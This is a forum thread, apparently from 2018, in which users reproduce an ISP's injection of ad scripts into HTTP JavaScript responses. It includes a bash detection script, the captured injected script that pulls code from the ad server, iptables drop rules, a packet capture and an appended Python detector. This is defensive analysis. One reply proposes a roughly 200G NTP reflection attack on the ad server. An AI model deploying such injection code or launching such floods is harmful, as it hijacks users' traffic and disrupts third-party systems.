
Reproducing the ad injection in China Telecom broadband traffic

    mario85 · Mar 29, 2018 · 4407 views

    It is well known that Guangdong Telecom broadband randomly pops up ad windows (no screenshot, anyone who has seen it knows). Because it shows up fairly randomly it has been hard to reproduce. I had some time these past few days to look into it and wrote a script that reproduces it:

    #!/bin/bash
    # Poll one JS URL through a randomly chosen resolved IP and log every response
    # that points at the 183.59.x.x ad servers instead of the real script.
    host='mat1.gtimg.com'
    path='/www/asset/seajs/sea.js'
    referer='http://www.qq.com/'
    useragent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'

    while :
    do
       # Keep only answer-section IPv4 addresses; the resolver's own "Address: x#53" line is skipped.
       hostips=$(nslookup "$host" | grep -Po '(?<=^Address: )[0-9.]+$')
       if [ -z "$hostips" ]; then printf '?'; sleep 10; continue; fi
       count=$(echo "$hostips" | wc -l)
       randresolv=$(echo "$hostips" | tail -n "$((1 + RANDOM % count))" | head -n 1)
       date=$(date)
       # Browser-like headers: the hijack only fires on .js requests that carry a Referer.
       content=$(curl -s -N --no-keepalive "http://$randresolv$path" -H "Host: $host" -H "User-Agent: $useragent" -H "Referer: $referer" -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache')
       if echo "$content" | grep -q 183.59; then
          logtext="ChinaTelecom javascript hijacking detected - $randresolv - $date"
          printf '\n%s' "$logtext"
          echo "$logtext" >> ./checklog
          echo "$content" > ./capturedcontent
       else
          printf .
       fi
       sleep 10
    done


    Telecom only hijacks HTTP requests whose URL ends in .js and that carry a Referer header. Pick any js file on the web, for example the SeaJS file on Tencent's home page, fill its details into the script's host, path and referer variables and run the script; after a while (up to an hour or two) the hijack appears, at a rate of roughly one hijacked response per 1 to 10 requests, at random.

    The script's output looks like this: http://ww2.sinaimg.cn/large/0060lm7Tly1fptp6dvpy0j30h20933z0.jpg

    The content substituted by the hijack:

    var _atn_obj_ = new Object;
    _atn_obj_.oldurl = 'http://mat1.gtimg.com/www/asset/seajs/sea.js?cHVzaA=100745';
    _atn_obj_.unified_url = 'http://183.59.53.197:3737/remind_adv/ad_unified_access?SP=ABzs...zoPP';
    window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
    window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);


    I don't know whether this counts as hard evidence. If it does, I plan to complain to 10000 (the Telecom hotline) this weekend, and if that has no effect I will write a detailed report and complain to MIIT.

    24 replies · 2018-05-24 01:05:40 +08:00
    silencefent · #1 · Mar 29, 2018
    Won't help.
    LGA1150 · #2 · Mar 29, 2018 via Android
    Is it a 301/302 redirect? For now you can filter the injected packets that race ahead of the real reply with iptables on the router:
    iptables -I FORWARD -p tcp --sport 80 -m string --string "Location: http://183.59.53." --algo bm -j DROP
    (remove the semicolon that V2 adds automatically yourself)
    You can also add a TTL match to reduce the load.
    Telegram · #3 · Mar 29, 2018 via iPhone
    At most they will add you to a whitelist so you personally don't get hijacked; getting them to stop this practice altogether is impossible.
    mario85 (OP) · #4 · Mar 29, 2018
    @LGA1150 It's not a 302; the hijack directly returns a 200 with the ad content.
    mario85 (OP) · #5 · Mar 29, 2018
    @Telegram Complaining to MIIT doesn't help either?
    When the time comes I'll check from some other accounts too; if it is still hijacking I won't let the case be closed.
    yexm0 · #6 · Mar 29, 2018 via iPhone
    No use. The most you'll get in the end is a refund and being told to get lost. Not being hijacked is impossible.
    Besides, you're far better off than other victims; what other people see is porn and gambling stuff (drugs apparently not yet).
    /t/403438
    /t/396849
    LGA1150 · #7 · Mar 29, 2018 via Android
    @mario85 Then filter that 200.
    300 · #8 · Mar 29, 2018
    "Telecom only hijacks URLs ending in .js" ———>
    That probably varies by region; blank pages get ads too, pages without a single character on them.

    The hijack also detects whether the client is a mobile device; there is a js file that does the check.

    Call customer service and simply say "turn off the hijacking" and she'll understand. They didn't admit to hijacking, though; they just kept stressing that the data center side would handle it.
    mario85 (OP) · #9 · Mar 29, 2018
    @LGA1150 If I filter the 200, the original content is gone too.
    The situation right now is that a request may return the normal content or may return the ad script, and both are 200.
    Only the response headers differ slightly; there is an Expire field.
    mario85 (OP) · #10 · Mar 29, 2018
    @winterbells Ads can appear even when you do nothing; it's really just the browser or some other background process loading js, which gets hijacked and pops straight up.
    mario85 (OP) · #11 · Mar 29, 2018
    @yexm0 It's a two-year contract anyway; if they break it I'd even make some money.
    From experience the whole city has this problem; if it were porn or drugs, Telecom would be finished.
    learnshare · #12 · Mar 29, 2018
    Even if you complain, they will only deal with your household.
    After all, privacy money is easy money.
    mario85 (OP) · #13 · Mar 29, 2018
    @learnshare I know plenty of people anyway; I'll go to someone's home for a cup of tea, join their WiFi and run the script. If it still shows up I won't say the problem is solved.
    Tampering with user traffic seems to be illegal. Right now it's ads; who knows whether they will quietly do other things.
    https://www.zhihu.com/question/20723856
    hicdn · #14 · Mar 29, 2018
    Stopping is impossible; see the earlier case where the State Council app was hijacked.
    LGA1150 · #15 · Mar 29, 2018 via Android
    @mario85 Does a packet capture show two 200s? Filter the hijacked one by TTL.
    learnshare · #16 · Mar 29, 2018
    @mario85 They will certainly do other things; the more money the better, of course.
    mario85 (OP) · #17 · Mar 29, 2018
    @LGA1150 So far I've only taken a quick look with F12; I haven't looked at it with Wireshark or the like yet.
    t895 · #18 · Mar 30, 2018 via iPhone
    Just got an NTP reflection going, roughly 200G; let's try hitting that server.
    ShareDuck · #19 · Apr 1, 2018 via Android
    About the ad problem: the first time it was only resolved after complaining to MIIT; every time after that the 10000 hotline sorted it out.
    qwertyegg · #20 · Apr 1, 2018
    In this situation, would using OpenDNS solve it?
    feng0vx · #21 · Apr 1, 2018 via Android
    No use; MIIT is useless now too. I complained about the ads, and they called back saying there is nothing in the contract restricting it and they can't do anything about it.
    wr410 · #22 · Apr 1, 2018
    A blog post I wrote many years ago; scroll straight to the end and have a look.
    https://blog.csdn.net/wr410/article/details/25594273
    wolfie · #23 · Apr 2, 2018
    Calling customer service can get it turned off.
    They even hijack https; what privacy is there to speak of.
    LGA1150 · #24 · May 24, 2018
    I seem to have captured the hijack packets.
    It seems every hijack packet contains a variable named "_atn_obj_",
    so I matched on that keyword with iptables:
    iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m string --string "_atn_obj_" --algo bm -j LOG
    while keeping tcpdump running in the background,
    until this line appeared in the kernel log:
    [54945.458949] IN=pppoe-wan OUT=ct MAC= SRC=119.23.80.130 DST=10.2.1.2 LEN=894 TOS=0x00 PREC=0x00 TTL=56 ID=9997 DF PROTO=TCP SPT=80 DPT=45021 WINDOW=256 RES=0x00 ACK PSH URGP=0

    Then I filtered the capture for that connection:
    00:35:20.051969 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [S], seq 296045250, win 64240, options [mss 1432,sackOK,TS val 3110253 ecr 0,nop,wscale 8], length 0
    00:35:20.060124 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [S.], seq 4085280, ack 296045251, win 14600, options [mss 1444,nop,nop,sackOK,nop,wscale 7], length 0
    00:35:20.071531 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1, win 251, length 0
    00:35:20.073405 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 1:1530, ack 1, win 251, length 1529: HTTP: GET /static/image/mobile/styletouch.css HTTP/1.1
    00:35:20.081913 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1433, win 137, length 0
    00:35:20.082025 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1530, win 137, length 0
    00:35:20.094693 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 1:245, ack 1530, win 137, length 244: HTTP: HTTP/1.1 304 Not Modified
    00:35:20.106128 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 245, win 256, length 0
    00:35:20.110373 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], seq 1530:2962, ack 245, win 256, length 1432: HTTP: GET /static/assets/js/amazeui.min.js HTTP/1.1
    00:35:20.110765 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 2962:3040, ack 245, win 256, length 78: HTTP
    00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK
    00:35:20.129715 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 3040, win 159, length 0
    00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:20.150041 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:20.154660 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:20.361116 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:20.361483 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:20.394913 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:20.582203 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:20.799507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:20.817570 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:21.021165 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:21.675574 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:21.715799 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:21.904377 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
    00:35:23.427507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:23.454270 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
    00:35:26.931735 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
    00:35:27.118104 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [R], seq 296048290, win 0, length 0

    As you can see,
    00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK
    is the hijacked 200 response, while what the real server returned is
    00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified

    Match the packets by keyword, TCP flags and TTL, and DROP them:
    iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m ttl --ttl-eq 55 --tcp-flags ALL PSH,ACK -m string --string "_atn_obj_" --algo bm -j DROP

    The servers hosting the ad content include 183.59.53.187, 183.59.53.188 and 183.59.53.224, and the OP's is 183.59.53.197, so it looks safe to block that whole range.
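As an added example that is not part of this thread, here is a small Python detector for the pattern LGA1150 shows above: two server-to-client segments that reuse the same starting TCP sequence number but carry different payloads, which a single legitimate server never produces. It assumes `tcpdump -n` output in the format quoted above and uses a constructed subset of those capture lines as sample input; the `-v` TTL field the iptables rule additionally relies on is not present in these lines, so only the sequence-number conflict is checked.

```python
import re
from collections import defaultdict

# One tcpdump -n line, e.g. "00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.],
# seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK"
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
    r"(?:, seq (?P<seq0>\d+):(?P<seq1>\d+))?.*?length (?P<len>\d+)"
    r"(?:: HTTP(?:: (?P<http>.*))?)?$"
)
# Constructed sample: a subset of the capture quoted in the thread (server 119.23.80.130:80,
# client 10.2.1.2:45021): the request, the injected 200, a bare ACK, the real 304 and one retransmit.
SAMPLE = [
    "00:35:20.110373 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], seq 1530:2962, ack 245, win 256, length 1432: HTTP: GET /static/assets/js/amazeui.min.js HTTP/1.1",
    "00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK",
    "00:35:20.129715 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 3040, win 159, length 0",
    "00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified",
    "00:35:20.361483 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified",
]

def parse(line):
    """Return a dict for one tcpdump line, or None if it is not a TCP segment line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    for k in ("sport", "dport", "seq0", "seq1", "len"):
        d[k] = int(d[k]) if d[k] is not None else None
    return d

def find_injected(lines, server_port=80):
    """Flag server->client data segments that reuse a starting seq with different content.
    Retransmissions (same end seq, same status line) are not conflicts. Returns one record
    per contested seq with the earliest-arriving segment (the racing injector) under 'first'."""
    by_seq = defaultdict(list)
    for rec in map(parse, lines):
        if rec and rec["sport"] == server_port and rec["seq0"] is not None and rec["len"] > 0:
            by_seq[(rec["src"], rec["dst"], rec["dport"], rec["seq0"])].append(rec)
    suspects = []
    for (src, dst, dport, seq0), segs in by_seq.items():
        if len({(s["seq1"], s["http"]) for s in segs}) > 1:
            segs.sort(key=lambda s: s["ts"])  # HH:MM:SS.ffffff sorts correctly as a string
            suspects.append({"server": src, "client": f"{dst}:{dport}", "seq": seq0,
                             "first": segs[0], "conflicting": segs[1:]})
    return suspects

if __name__ == "__main__":
    print(find_injected(SAMPLE))
```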